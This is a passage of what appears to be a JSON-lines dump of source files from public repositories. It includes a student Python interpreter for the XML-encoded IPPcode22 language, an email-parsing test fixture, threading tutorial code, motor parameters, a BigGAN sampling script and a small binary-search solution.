check\ninstructionNumOfArguments = {\n 0 : ('CREATEFRAME', 'PUSHFRAME', 'POPFRAME', 'RETURN', 'BREAK'),\n 1 : ('DEFVAR', 'POPS', 'CALL', 'LABEL', 'JUMP', 'PUSHS', 'WRITE', 'EXIT', 'DPRINT'),\n 2 : ('MOVE', 'INT2CHAR', 'STRLEN', 'TYPE', 'READ', 'NOT'),\n 3 : ('ADD', 'SUB', 'MUL', 'IDIV', 'LT', 'GT', 'EQ', 'JUMPIFEQ', 'JUMPIFNEQ', 'OR', 'AND', 'STRI2INT', 'CONCAT', 'GETCHAR', 'SETCHAR')\n} \n\n# dictionary with specific types of arguments for each instruction \n# this part is also implemented in parser / syntactic check\ninstructionArgumentsTypes = {\n 'CREATEFRAME' : [None, None, None],\n 'PUSHFRAME' : [None, None, None],\n 'POPFRAME' : [None, None, None],\n 'RETURN' : [None, None, None],\n 'BREAK' : [None, None, None],\n 'DEFVAR' : ['VAR', None, None],\n 'POPS' : ['VAR', None, None],\n 'CALL' : ['LABEL', None, None],\n 'LABEL' : ['LABEL', None, None],\n 'JUMP' : ['LABEL', None, None],\n 'PUSHS' : ['SYMB', None, None],\n 'WRITE' : ['SYMB', None, None],\n 'EXIT' : ['SYMB', None, None],\n 'DPRINT' : ['SYMB', None, None],\n 'MOVE' : ['VAR', 'SYMB', None],\n 'INT2CHAR' : ['VAR', 'SYMB', None],\n 'STRLEN' : ['VAR', 'SYMB', None],\n 'TYPE' : ['VAR', 'SYMB', None], \n 'READ' : ['VAR', 'TYPE', None],\n 'NOT' : ['VAR', 'SYMB', None],\n 'ADD' : ['VAR', 'SYMB', 'SYMB'],\n 'SUB' : ['VAR', 'SYMB', 'SYMB'],\n 'MUL' : ['VAR', 'SYMB', 'SYMB'],\n 'IDIV' : ['VAR', 'SYMB', 'SYMB'],\n 'LT' : ['VAR', 'SYMB', 'SYMB'],\n 'GT' : ['VAR', 'SYMB', 'SYMB'],\n 'EQ' : ['VAR', 'SYMB', 'SYMB'],\n 'JUMPIFEQ' : ['VAR', 'SYMB', 'SYMB'],\n 'JUMPIFNEQ' : ['VAR', 'SYMB', 'SYMB'],\n 'OR' : ['VAR', 'SYMB', 'SYMB'],\n 'AND' : ['VAR', 'SYMB', 'SYMB'],\n 'STRI2INT' : ['VAR', 'SYMB', 'SYMB'],\n 'CONCAT' : ['VAR', 'SYMB', 'SYMB'],\n 'GETCHAR' : ['VAR', 'SYMB', 'SYMB'],\n 'SETCHAR' : ['VAR', 'SYMB', 'SYMB'],\n}\n\n#### DATA STRUCTURES AND IMPORTANT VARIABLES ####\ninsNum = 0 # loop counter\nnumberOfLFs = 0 # number of Local Frames\nIsTempFrameCreated = False\nexistsTempFrame = False\nisEOF = False\ntempDict = {} # dictonary used for swapping variables between varList and varStack\nvarList = {} # dictonary for all available variables\nlabelList = {} \ndataStack = [] # stack used by instructions PUSHS and POPS\ncallList = [] # stack used by instructions CALL and RETURN\nvarStack = [] # stack for LF variables which are currenly not available\nsortedIns = []\n\nclass Val(Enum):\n NIL = 'nil'\nclass Var(IntEnum):\n VALUE = 0 \n TYPE = 1\n\nclass ProgramArgs:\n # this class takes care of program arguments, their parsing and checks correctness\n\n def __init__(self):\n self.inputToBeExecuted = None\n self._parser = None\n self._arguments = None\n self.inputToBeRead = None\n self.sourceBool = False\n self.inputBool = False\n \n def executeProgramParams(self):\n self.parseProgramsArgumets()\n self.checkProgramArguments()\n self.checkProgramsArgumentsPath()\n \n def parseProgramsArgumets(self):\n # parses arguments with argParse\n if '--help' in sys.argv and len(sys.argv) > 2: exit(10)\n if '-h' in sys.argv and len(sys.argv) > 2: exit(10)\n self._parser = argparse.ArgumentParser(description=\"IPP/2022 Interpret\")\n self._parser.add_argument(\"--source\", action=\"store\", dest=\"source\")\n self._parser.add_argument(\"--input\", action=\"store\", dest=\"input\")\n self._arguments = self._parser.parse_args()\n \n def checkProgramArguments(self):\n # checks if user entered correct arguments\n\n if self._arguments.source == None and self._arguments.input == None:\n pass #exit(10)\n elif self._arguments.source != None and self._arguments.input == None:\n self.inputToBeExecuted = self._arguments.source\n self.inputToBeRead = sys.stdin\n self.sourceBool = True\n elif self._arguments.source == None and self._arguments.input != None:\n self.inputToBeExecuted = sys.stdin\n self.inputToBeRead = open(self._arguments.input, \"r\")\n self.inputBool = True\n elif self._arguments.source != None and self._arguments.input != None:\n self.inputToBeExecuted = self._arguments.source\n self.inputToBeRead = open(self._arguments.input, \"r\")\n self.sourceBool, self.inputBool = True, True\n \n def checkProgramsArgumentsPath(self):\n # this method is checking the existence of file(s)\n\n isExists = None\n if self.sourceBool:\n isExists = os.path.exists(self._arguments.source)\n if not isExists:\n exit(11)\n if self.inputBool:\n isExists = os.path.exists(self._arguments.input)\n if not isExists:\n exit(11)\n\nclass Instruction:\n arg1, arg2, arg3 = None, None, None\n \n def __init__(self, opcode, num, arg):\n self._opcode = opcode\n self._num = num\n self._type: str\n\n self.checkOpCode()\n if(rootLength >= 1): self.arg1 = Argument(1, (arg[0].get('type')).upper(), arg[0].text)\n if(rootLength >= 2): self.arg2 = Argument(2, (arg[1].get('type')).upper(), arg[1].text)\n if(rootLength == 3): self.arg3 = Argument(3, (arg[2].get('type')).upper(), arg[2].text)\n if self.arg1: self.arg1.check()\n if self.arg2: self.arg2.check()\n if self.arg3: self.arg3.check()\n \n def getOpcode(self):\n return self._opcode \n\n def checkOpCode(self):\n if not self._opcode in instructionNumOfArguments[self._num]:\n exit(32)\n\n\nclass Argument:\n def __init__(self, num, typ: str, value):\n self._num = num\n self._typ = typ\n self._value = value\n\n def getValue(self):\n return self._value\n \n def getType(self):\n return self._typ\n\n def checkArgumentsType(self,typ):\n if typ == self._typ or typ == 'VAR':\n pass\n elif typ == \"SYMB\" and self._typ in ('VAR', 'INT', 'STRING', 'BOOL', 'NIL'):\n pass\n elif typ == \"TYPE\" and self._typ in (\"int\", \"string\", \"bool\"):\n pass\n elif typ == 'LABEL' and self._typ == 'LABEL':\n pass\n else:\n exit(53)\n \n def check(self):\n \"\"\" Checks arguments - if variable is defined properly (in existing frame), undefined\n variables, in case we are going read from variables so they are not uninitializated. \n Escape sequentions, type conversions. \n \"\"\"\n\n self.checkArgumentsType(instructionArgumentsTypes[insOpCode][self._num-1])\n if self._typ == 'VAR' and not insOpCode == 'DEFVAR':\n if self._value.startswith('TF') and not existsTempFrame : exit(55)\n if self._value.startswith('LF') and numberOfLFs == 0 : exit(55)\n if not self._value in varList: exit(54)\n self._varName = self._value\n if not self._num == 1:\n self._typ = varList[self._value][Var.TYPE]\n self._value = varList[self._value][Var.VALUE]\n self.checkTypeConversion()\n self.replaceEscapeSequences()\n if self._value == None and insOpCode != 'TYPE': exit(56)\n\n def replaceEscapeSequences(self):\n \"\"\" This method looks for escape sequences by regex. It saves them into an array 'x'.\n Then it converts them to integers and by chr() function replaces these escape sequences\n by their queal representation in ASCII. If the string is empty this method is not performed.\n \"\"\"\n\n if self._typ == 'STRING' and self._value != None:\n x = re.findall(r\"\\\\[0-9]{3}\", self._value)\n x = [string[1:] for string in x]\n x = list(map(int, x))\n for escSeq in x:\n toReplace = '\\\\0' + str(escSeq)\n self._value = self._value.replace(toReplace, chr(escSeq))\n elif self._typ == 'STRING' and self._value == None:\n self._value = ''\n \n def checkTypeConversion(self):\n \"\"\" Converts string represented values into their real types \"\"\"\n\n if self._typ == 'INT':\n try: \n self._value = int(self._value)\n except: \n exit(32)\n elif self._typ == 'BOOL':\n if self._value == True or self._value== 'true':\n self._value = True\n else:\n self._value = False\n elif self._typ == 'NIL':\n self._value = Val.NIL\n else :\n return\n\nclass Program:\n \n sortedIns = []\n def __init__(self, treeToBeParsed):\n if os.stat(treeToBeParsed).st_size == 0:\n exit(0)\n try:\n self._tree = ET.parse(treeToBeParsed)\n except ET.ParseError:\n exit(31)\n self._root = self._tree.getroot()\n \n def executeProgram(self):\n self.checkStructionOfXMLTree()\n self.orderInstructions()\n self.findLabels()\n\n def checkStructionOfXMLTree(self):\n \"\"\" Checks the representation of XML tree. It goes intruction by instruction and\n their arguments and checks their tags and atributtes. If anything fails, the exit\n is called. \"\"\"\n\n try:\n for ins in self._root:\n assert ins.tag == 'instruction'\n assert ins.attrib['opcode'] \n assert ins.attrib['order'] \n numOfArgs = 0 \n for arg in ins:\n assert re.match(r\"^arg[1-3]$\", arg.tag)\n assert arg.attrib['type']\n numOfArgs = numOfArgs + 1\n assert self._root.tag == 'program'\n assert self._root.attrib['language'] \n assert self._root.get('language') == 'IPPcode22'\n except:\n exit(32)\n\n def orderInstructions(self):\n \"\"\" Sorts instructions with lambda function by their order. It looks for duplicated orders \n and non-positive values. \"\"\"\n\n try:\n sortedIns[:] = sorted(self._root, key=lambda child: (child.tag,int(child.get('order'))))\n duplicatedOrderds = []\n for ins in sortedIns:\n num = int(ins.get('order'))\n duplicatedOrderds.append(num)\n if num < 1: exit(32) # detects non-positive order numbers\n if not len(duplicatedOrderds) == len(set(duplicatedOrderds)): exit(32) # detects duplication of order numbers\n except:\n exit(32)\n\n def findLabels(self):\n \"\"\" Looks for labels and checks their uniqueness. \"\"\"\n\n cycle = 0\n for ins in self._root:\n if ins.get('opcode') == 'LABEL':\n if ins[0].text in labelList:\n exit(52)\n labelList[ins[0].text] = cycle\n cycle = cycle + 1\n\n#### PROGRAM STARTS EXECUTING HERE ####\nif __name__ == \"__main__\":\n argParse = ProgramArgs()\n argParse.executeProgramParams()\n program = Program(argParse.inputToBeExecuted)\n program.executeProgram()\n\n # main loop executing instructions\n while True:\n # tries to load new instruction and execute it, otherwise throws exit(0)\n try: \n r = sortedIns[insNum]\n except: \n exit(0)\n\n tempDict = {} # used for swapping variables between varStack and varList\n insOpCode = r.get('opcode').upper() # obtains current instruction's operation code\n rootLength = len(sortedIns[insNum]) # num of arguents\n arg = []\n arg[:] = sorted(r,key=lambda x: x.tag) # sorts arguments by their tags\n ins = Instruction(insOpCode, rootLength, arg)\n\n if ins.arg1:\n valueArg1 = ins.arg1.getValue()\n typeArg1 = ins.arg1.getType()\n if ins.arg2:\n valueArg2 = ins.arg2.getValue()\n typeArg2 = ins.arg2.getType()\n if ins.arg3:\n valueArg3 = ins.arg3.getValue()\n typeArg3 = ins.arg3.getType()\n \n # **** (INSTRUCTIONS EXECUTION) ****\n # **** Working with Frames, Functions Calls ****\n # MOVE\n if insOpCode == 'MOVE':\n varList[valueArg1][Var.VALUE] = valueArg2\n varList[valueArg1][Var.TYPE] = typeArg2\n \n # CREATEFRAME\n elif insOpCode == 'CREATEFRAME':\n if existsTempFrame: # deletes variables in current TF if it already exists\n [varList.pop(var) for var in list(varList.keys()) if var.startswith('TF')]\n IsTempFrameCreated = True \n existsTempFrame = True\n\n # PUSHFRAME\n elif insOpCode == \"PUSHFRAME\":\n if not IsTempFrameCreated: exit(55) # Undefined frame\n numberOfLFs += 1\n\n # if any LF now exists push its values to the stack and make them not available for usage\n for var in list(varList.keys()):\n if var.startswith('LF'):\n tempDict[var] = varList.pop(var)\n varStack.append(tempDict)\n\n # change every current TF to LF\n for var in list(varList.keys()):\n newKey = var.replace('TF', 'LF')\n varList[newKey] = varList.pop(var)\n \n IsTempFrameCreated = False\n existsTempFrame = False \n \n # POPFRAME\n elif insOpCode == \"POPFRAME\":\n if numberOfLFs == 0: exit(55)\n if existsTempFrame == True: # deletes variables in current TF if it already exists\n [varList.pop(var) for var in list(varList.keys()) if var.startswith('TF')]\n\n # moves current LF values to TF \n for var in list(varList.keys()):\n newKey = var.replace('LF', 'TF')\n varList[newKey] = varList.pop(var)\n\n # moves variables from stack to current LF, if any exists\n varList.update(varStack.pop())\n \n numberOfLFs -= 1\n IsTempFrameCreated = True\n existsTempFrame = True\n \n # DEFVAR \n elif insOpCode == 'DEFVAR':\n if valueArg1 in varList: exit(52) \n if valueArg1.startswith('TF') and existsTempFrame:\n varList[valueArg1] = [None, None]\n elif valueArg1.startswith('LF') and not numberOfLFs == 0:\n varList[valueArg1] = [None, None]\n elif valueArg1.startswith('GF'):\n varList[valueArg1] = [None , None]\n else: \n exit(55) \n\n # CALL\n elif insOpCode == 'CALL':\n if not valueArg1 in labelList: exit(52)\n callList.append(insNum)\n insNum = labelList[valueArg1] \n\n # RETURN\n elif insOpCode == 'RETURN':\n if not callList: exit(56) \n insNum = callList.pop()\n\n # **** Working with the data stack ****\n # PUSHS\n elif insOpCode == 'PUSHS':\n if typeArg1 == 'VAR':\n valueVar = varList[valueArg1][Var.VALUE]\n if valueVar == None: exit(56)\n dataStack.append([valueArg1, typeArg1])\n else:\n dataStack.append([valueArg1, typeArg1])\n\n # POPS \n elif insOpCode == 'POPS': \n if not dataStack: exit(56) \n poppedData = dataStack.pop()\n varList[valueArg1][Var.VALUE] = poppedData[Var.VALUE]\n varList[valueArg1][Var.TYPE] = poppedData[Var.TYPE]\n\n # **** Arithmetic, relational, Boolean and conversion instructions ****\n # ADD, SUB, MUL, IDIV\n elif insOpCode in ('ADD', 'SUB', 'MUL', 'IDIV'): \n if typeArg2 != 'INT' or typeArg3 != 'INT': exit(53)\n if insOpCode == 'ADD':\n varList[valueArg1][Var.VALUE] = valueArg2 + valueArg3\n elif insOpCode == 'SUB':\n varList[valueArg1][Var.VALUE] = valueArg2 - valueArg3\n elif insOpCode == 'MUL':\n varList[valueArg1][Var.VALUE] = valueArg2 * valueArg3\n elif insOpCode == 'IDIV':\n if valueArg3 == 0: exit(57)\n varList[valueArg1][Var.VALUE] = int(valueArg2 / valueArg3)\n varList[valueArg1][Var.TYPE] = 'INT'\n\n # LT, GT, EQ\n elif insOpCode in ('LT', 'GT', 'EQ'):\n if insOpCode == 'LT':\n if typeArg2 == 'NIL' or typeArg3 == 'NIL': exit(53)\n if typeArg2 != typeArg3: exit(53)\n if valueArg2 < valueArg3:\n varList[valueArg1][Var.VALUE] = True\n else:\n varList[valueArg1][Var.VALUE] = False\n \n elif insOpCode == 'GT':\n if typeArg2 == 'NIL' or typeArg3 == 'NIL': exit(53)\n if typeArg2 != typeArg3: exit(53)\n if valueArg2 > valueArg3:\n varList[valueArg1][Var.VALUE] = True\n else:\n varList[valueArg1][Var.VALUE] = False\n \n elif insOpCode == 'EQ':\n if typeArg2 != typeArg3:\n if typeArg2 == 'NIL' or typeArg3 == 'NIL':\n pass\n else:\n exit(53) \n if valueArg2 == valueArg3:\n varList[valueArg1][Var.VALUE] = True\n else:\n varList[valueArg1][Var.VALUE] = False\n varList[valueArg1][Var.TYPE] = 'BOOL'\n\n # AND, OR, NOT\n elif insOpCode in ('AND', 'OR', 'NOT'):\n if typeArg2 != 'BOOL': exit(53)\n if insOpCode == 'NOT':\n if valueArg2 == False:\n varList[valueArg1][Var.VALUE] = True\n elif valueArg2 == True:\n varList[valueArg1][Var.VALUE] = False\n else:\n if typeArg3 != 'BOOL': exit(53)\n if insOpCode == 'AND':\n if valueArg2 == False and valueArg3 == False:\n varList[valueArg1][Var.VALUE] = False\n elif valueArg2 == False and valueArg3 == True:\n varList[valueArg1][Var.VALUE] = False\n elif valueArg2 == True and valueArg3 == False:\n varList[valueArg1][Var.VALUE] = False\n elif valueArg2 == True and valueArg3 == True:\n varList[valueArg1][Var.VALUE] = True\n if insOpCode == 'OR':\n if valueArg2 == False and valueArg3 == False:\n varList[valueArg1][Var.VALUE] = False\n elif valueArg2 == False and valueArg3 == True:\n varList[valueArg1][Var.VALUE] = True\n elif valueArg2 == True and valueArg3 == False:\n varList[valueArg1][Var.VALUE] = True\n elif valueArg2 == True and valueArg3 == True:\n varList[valueArg1][Var.VALUE] = True \n varList[valueArg1][Var.TYPE] = 'BOOL' \n\n # INT2CHAR\n elif insOpCode == 'INT2CHAR': \n if typeArg2 != 'INT': exit(53)\n if not 0 < valueArg2 < 256: exit(58)\n varList[valueArg1][Var.VALUE] = chr(valueArg2)\n varList[valueArg1][Var.TYPE] = 'STRING'\n \n # STRI2INT\n elif insOpCode == 'STRI2INT':\n if typeArg2 != 'STRING' or typeArg3 != 'INT': exit(53)\n if not 0 < valueArg3 < len(valueArg2): exit(58)\n varList[valueArg1][Var.VALUE] = ord(valueArg2[valueArg3])\n varList[valueArg1][Var.TYPE] = 'INT'\n \n # **** I/O Instructions ****\n # READ\n elif insOpCode == 'READ':\n typeArg2 = (arg[1].text).upper()\n inputValue = argParse.inputToBeRead.readline() \n if not inputValue: isEOF = True\n if isEOF == False and inputValue[-1] == '\\n':\n inputValue = inputValue[:-1] # cuts the newline \n if typeArg2 == 'BOOL':\n if inputValue.lower() == 'true':\n varList[valueArg1][Var.VALUE] = True\n varList[valueArg1][Var.TYPE] = 'BOOL'\n else:\n varList[valueArg1][Var.VALUE] = False\n varList[valueArg1][Var.TYPE] = 'BOOL'\n elif typeArg2 == 'INT':\n try: \n varList[valueArg1][Var.VALUE] = int(inputValue)\n varList[valueArg1][Var.TYPE] = 'INT'\n except: \n varList[valueArg1][Var.VALUE] = Val.NIL\n varList[valueArg1][Var.TYPE] = 'NIL' \n elif typeArg2 == 'STRING' and not isEOF:\n varList[valueArg1][Var.VALUE] = inputValue\n varList[valueArg1][Var.TYPE] = 'STRING'\n else:\n varList[valueArg1][Var.VALUE] = Val.NIL\n varList[valueArg1][Var.TYPE] = 'NIL'\n\n # WRITE\n elif insOpCode == 'WRITE':\n if typeArg1 == 'VAR':\n if varList[valueArg1][Var.VALUE] == None: exit(56)\n valueArg1 = varList[valueArg1][Var.VALUE]\n valueArg1 = str(valueArg1)\n if valueArg1 == 'True': valueArg1 = 'true'\n elif valueArg1 == 'False': valueArg1 = 'false'\n elif valueArg1 == 'Val.NIL': valueArg1 = ''\n print(valueArg1, end=\"\")\n\n # **** Working with strings ****\n # CONCAT \n elif insOpCode == 'CONCAT': \n if typeArg2 != 'STRING' or typeArg3 != 'STRING': exit(53)\n varList[valueArg1][Var.VALUE] = valueArg2 + valueArg3\n varList[valueArg1][Var.TYPE] = 'STRING'\n\n # STRLEN\n elif insOpCode == 'STRLEN': \n if typeArg2 != 'STRING': exit(53)\n varList[valueArg1][Var.VALUE] = len(valueArg2)\n varList[valueArg1][Var.TYPE] = 'INT'\n\n # GETCHAR\n elif insOpCode == 'GETCHAR': \n if typeArg2 != 'STRING' or typeArg3 != 'INT': exit(53) \n lenArg2 = len(valueArg2)-1\n if valueArg3 > lenArg2 or valueArg3 < 0: exit(58)\n varList[valueArg1][Var.VALUE] = valueArg2[valueArg3]\n varList[valueArg1][Var.TYPE] = 'STRING'\n\n # SETCHAR\n elif insOpCode == 'SETCHAR':\n if varList[valueArg1][Var.VALUE] == None: exit(56)\n if varList[valueArg1][Var.TYPE] != 'STRING': exit(53)\n if typeArg2 != 'INT' or typeArg3 != 'STRING': exit(53) \n string = varList[valueArg1][Var.VALUE]\n index = valueArg3\n if len(valueArg3) == 0: exit(58)\n lenArg1 = len(varList[valueArg1][Var.VALUE]) - 1\n if valueArg2 < 0 or valueArg2 > lenArg1: exit(58) # Bad work with the string \n varList[valueArg1][Var.VALUE] = string[:valueArg2] + valueArg3[0] + string[valueArg2+1:]\n\n # **** Working with types ****\n # TYPE - dynamically detects the type of the symbol and writes a string indiciating this type to a variable\n elif insOpCode == 'TYPE':\n if typeArg2 in ('INT', 'STRING', 'BOOL', 'NIL'):\n varList[valueArg1][Var.VALUE] = typeArg2.lower()\n varList[valueArg1][Var.TYPE] = 'STRING'\n else:\n varList[valueArg1][Var.VALUE] = ''\n varList[valueArg1][Var.TYPE] = 'STRING'\n\n # **** Program flow control instructions ****\n # JUMP - unconditional jump\n elif insOpCode == 'JUMP':\n if not valueArg1 in labelList: exit(52) \n insNum = labelList[valueArg1]\n\n # JUMPIFEQ, JUMPIFNEQ - conditional jump\n elif insOpCode in ('JUMPIFEQ', 'JUMPIFNEQ'):\n if not valueArg1 in labelList: exit(52)\n if not typeArg2 == typeArg3:\n if typeArg2 == 'NIL' or typeArg3 == 'NIL':\n pass\n else:\n exit(53) # Bad operand types \n if insOpCode == 'JUMPIFEQ' and valueArg2 == valueArg3: \n insNum = labelList[valueArg1]\n if insOpCode == 'JUMPIFNEQ' and valueArg2 != valueArg3:\n insNum = labelList[valueArg1]\n \n # EXIT - terminates program execution\n elif insOpCode == 'EXIT':\n if typeArg1 == 'VAR':\n typeArg1 = varList[valueArg1][Var.TYPE]\n valueArg1 = varList[valueArg1][Var.VALUE]\n if valueArg1 == None : exit(56)\n if typeArg1 != 'INT' : exit(53)\n if valueArg1 < 0 or valueArg1 > 49: exit(57)\n exit(valueArg1)\n \n # **** Debugging instructions ****\n # DPRINT - prints the specified value to standard error output\n elif insOpCode == 'DPRINT':\n if typeArg1 == 'VAR':\n typeArg1 = varList[valueArg1][Var.TYPE]\n valueArg1 = varList[valueArg1][Var.VALUE]\n if valueArg1 == None : exit(56)\n print(valueArg1, file = sys.stderr)\n \n # BREAK\n elif insOpCode == 'BREAK':\n print(\"Předpokládá se, že na standardní chybový výstup vypíše stav interpretu.\" , file = sys.stderr)\n\n insNum = insNum + 1;\n","repo_name":"AveAvatar/vutfit-ipp","sub_path":"project2/interpret.py","file_name":"interpret.py","file_ext":"py","file_size_in_byte":26115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"27550319230","text":"import datetime\nfrom imap_tools import EmailAddress\n\nDATA = dict(\n subject='Saying Hello',\n from_='jdoe@machine.example',\n to=('mary@example.net',),\n cc=(),\n bcc=(),\n reply_to=(),\n date=datetime.datetime(1997, 11, 21, 9, 55, 6, tzinfo=datetime.timezone.utc),\n date_str='21 Nov 97 09:55:06 GMT',\n text='This is a message just to say hello.\\r\\nSo, \"Hello\".\\r\\n',\n html='',\n headers={'from': ('John Doe ',), 'to': ('Mary Smith ',), 'subject': ('Saying Hello',), 'date': ('21 Nov 97 09:55:06 GMT',), 'message-id': ('<1234@local.machine.example>',)},\n attachments=[],\n from_values=EmailAddress(name='John Doe', email='jdoe@machine.example'),\n to_values=(EmailAddress(name='Mary Smith', email='mary@example.net'),),\n cc_values=(),\n bcc_values=(),\n reply_to_values=(),\n)","repo_name":"ikvk/imap_tools","sub_path":"tests/messages_data/rfc2822/example12.py","file_name":"example12.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","stars":608,"dataset":"github-code","pt":"36"} +{"seq_id":"29721377783","text":"# from threading import Thread\n# from time import sleep\n# import time\n\n\n# # class MyClass(Thread):\n# # def __init__(self, tName, tTime, tCounter):\n# # Thread.__init__(self)\n# # self.tName = tName\n# # self.tTime = tTime\n# # self.tCounter = tCounter\n# #\n# # def run(self):\n# # print(\"Strating {}\".format(self.tName))\n# # self.myPrint(self.tTime, self.tTime, self.tCounter)\n# # print(\"Ending {}\".format(self.tName))\n# #\n# # def myPrint(self, tName, tTime, counter):\n# # while counter:\n# # print(\"{} : {}\".format(tName, time.ctime()))\n# # sleep(tTime)\n# # counter-=1\n# #\n# # t1 = MyClass(\"Thread 1\", 1, 5)\n# # t2 = MyClass(\"Thread 2\", 2, 5)\n# #\n# # t1.start()\n# # t2.start()\n# #\n# # t1.join()\n# # t2.join()\n# # print(\"Ending main thread\")\n\n\n# class MyClass():\n# def __init__(self, tName, tTime, tCounter):\n# self.tName = tName\n# self.tTime = tTime\n# self.tCounter = tCounter\n\n# def run(self):\n# print(\"Strating {}\".format(self.tName))\n# self.myPrint(self.tTime, self.tTime, self.tCounter)\n# print(\"Ending {}\".format(self.tName))\n\n# def myPrint(self, tName, tTime, counter):\n# while counter:\n# print(\"{} : {}\".format(tName, time.ctime()))\n# sleep(tTime)\n# counter-=1\n\n# t1 = MyClass(\"Thread 1\", 1, 5)\n# t2 = MyClass(\"Thread 2\", 2, 5)\n\n# t1.run()\n# t2.run()\n\n# print(\"Ending main thread\")\n\n\n\n# \"\"\"\n# Output :\n\n# Strating Thread 1\n# 1 : Wed Dec 22 14:11:36 2021\n# 1 : Wed Dec 22 14:11:37 2021\n# 1 : Wed Dec 22 14:11:38 2021\n# 1 : Wed Dec 22 14:11:39 2021\n# 1 : Wed Dec 22 14:11:40 2021\n# Ending Thread 1\n# Strating Thread 2\n# 2 : Wed Dec 22 14:11:41 2021\n# 2 : Wed Dec 22 14:11:43 2021\n# 2 : Wed Dec 22 14:11:45 2021\n# 2 : Wed Dec 22 14:11:47 2021\n# 2 : Wed Dec 22 14:11:49 2021\n# Ending Thread 2\n# Ending main thread\n# \"\"\"\n\n\n###..................................................................\n\n\n## Python program to illustrate the concept of threading, importing the threading module\n\n# import threading\n\n# def print_cube(num):\n# \t\"\"\"\n# \tfunction to print cube of given num\n# \t\"\"\"\n# \tprint(\"Cube: {}\".format(num * num * num))\n\n# def print_square(num):\n# \t\"\"\"\n# \tfunction to print square of given num\n# \t\"\"\"\n# \tprint(\"Square: {}\".format(num * num))\n\n# if __name__ == \"__main__\":\n# \t# creating thread\n# \tt1 = threading.Thread(target=print_square, args=(10,))\n# \tt2 = threading.Thread(target=print_cube, args=(10,))\n\n# \t# starting thread 1\n# \tt1.start()\n# \t# starting thread 2\n# \tt2.start()\n\n# \t# wait until thread 1 is completely executed\n# \tt1.join()\n# \t# wait until thread 2 is completely executed\n# \tt2.join()\n\n# \t# both threads completely executed\n# \tprint(\"Done!\")\n\n###..................................................................\n\n# Python program to illustrate the concept\n# of threading\nimport threading\nimport os\n\ndef task1():\n\tprint(\"Task 1 assigned to thread: {}\".format(threading.current_thread().name))\n\tprint(\"ID of process running task 1: {}\".format(os.getpid()))\n\ndef task2():\n\tprint(\"Task 2 assigned to thread: {}\".format(threading.current_thread().name))\n\tprint(\"ID of process running task 2: {}\".format(os.getpid()))\n\nif __name__ == \"__main__\":\n\n\t# print ID of current process\n\tprint(\"ID of process running main program: {}\".format(os.getpid()))\n\n\t# print name of main thread\n\tprint(\"Main thread name: {}\".format(threading.current_thread().name))\n\n\t# creating threads\n\tt1 = threading.Thread(target=task1, name='t1')\n\tt2 = threading.Thread(target=task2, name='t2')\n\n\t# starting threads\n\tt1.start()\n\tt2.start()\n\n\t# wait until all threads finish\n\tt1.join()\n\tt2.join()\n\n\"\"\"\noutput :\nID of process running main program: 10216\nMain thread name: MainThread\nTask 1 assigned to thread: t1\nID of process running task 1: 10216\nTask 2 assigned to thread: t2\nID of process running task 2: 10216\n\n\"\"\"\n\n###..................................................................\n\n","repo_name":"mohitnamdev102/python","sub_path":"Python (Utsav Patel)/22_Multi Threading.py","file_name":"22_Multi Threading.py","file_ext":"py","file_size_in_byte":3993,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"36049807222","text":"\n\"\"\" Notorious FRC brushed motor, the CIM. Parameters hodge-podged from various Chief Delphi threads.\"\"\"\ncim = {\n 'kr': 0.0185, # Torque/back-EMF constant (N-m/A) or (V-s/rad)\n 'Ra': 0.091, # Armature resistance (ohm)\n 'La': 59e-6, # Armature inductance (H)\n 'Jr': 0.000075, # Motor inertia (kg-m^2)\n 'B': 9e-5, # Motor damping coefficient (N-m-s/rad)\n 'Tl': 0, # Load torque\n 'Tf': 0.05 # Dry friction torque\n}","repo_name":"nathnkim/MotorSimulation","sub_path":"bigmmac/motorparams.py","file_name":"motorparams.py","file_ext":"py","file_size_in_byte":485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"9535477844","text":"import BigGAN\nimport numpy as np\nimport sys\n\nfrom torchvision.utils import save_image\nfrom utils import *\n\n\ndef main():\n # Set up cudnn.benchmark for free speed.\n torch.backends.cudnn.benchmark = True\n device = \"cuda:0\"\n\n print(\"Loading the BigGAN generator model...\", flush=True)\n resolution = 256\n config = get_config(resolution)\n G = BigGAN.Generator(**config)\n G.load_state_dict(\n torch.load(\"pretrained_weights/biggan_256_weights.pth\"), strict=False\n )\n G = nn.DataParallel(G).to(device)\n G.eval()\n\n data_source = sys.argv[1] # \"imagenet\" or \"places\".\n target = sys.argv[2] # Filename found in \"imagenet\" or \"places\" directory.\n class_embedding = np.load(f\"{data_source}/{target}.npy\")\n class_embedding = torch.tensor(class_embedding)\n\n z_num = 16\n repeat_class_embedding = class_embedding.repeat(z_num, 1).to(device)\n zs = torch.randn((z_num, dim_z_dict[resolution]), requires_grad=False).to(device)\n\n gan_images_tensor = G(zs, repeat_class_embedding)\n\n save_dir = \"samples\"\n print(f\"Saving class embedding samples in {save_dir}.\", flush=True)\n os.makedirs(save_dir, exist_ok=True)\n final_image_path = f\"{save_dir}/{data_source}_{target}.jpg\"\n save_image(gan_images_tensor, final_image_path, normalize=True, nrow=4)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"qilimk/biggan-am","sub_path":"sample_biggan_am_embedding.py","file_name":"sample_biggan_am_embedding.py","file_ext":"py","file_size_in_byte":1343,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"36"} +{"seq_id":"37502407227","text":"# https://www.acmicpc.net/problem/3649\nimport sys\ninput = sys.stdin.readline\n\nwhile True:\n try:\n x = int(input().strip()) * 10000000\n except:\n break\n n = int(input().strip())\n swi = False\n if n == 0: \n print('danger')\n continue\n a = []\n for _ in range(n):\n a.append(int(input()))\n a.sort()\n p1 = 0\n p2 = n - 1\n while p1 != p2:\n s = a[p1] + a[p2]\n if x == s:\n print(f'yes {a[p1]} {a[p2]}')\n swi = True\n break\n elif x < s:\n p2 -= 1\n else:\n p1 += 1\n if not swi:\n print('danger')","repo_name":"junsgi/Algorithm","sub_path":"Binary_Search/로봇 프로젝트.py","file_name":"로봇 프로젝트.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"27611807248","text":"import sys\n\nsys.setrecursionlimit(10 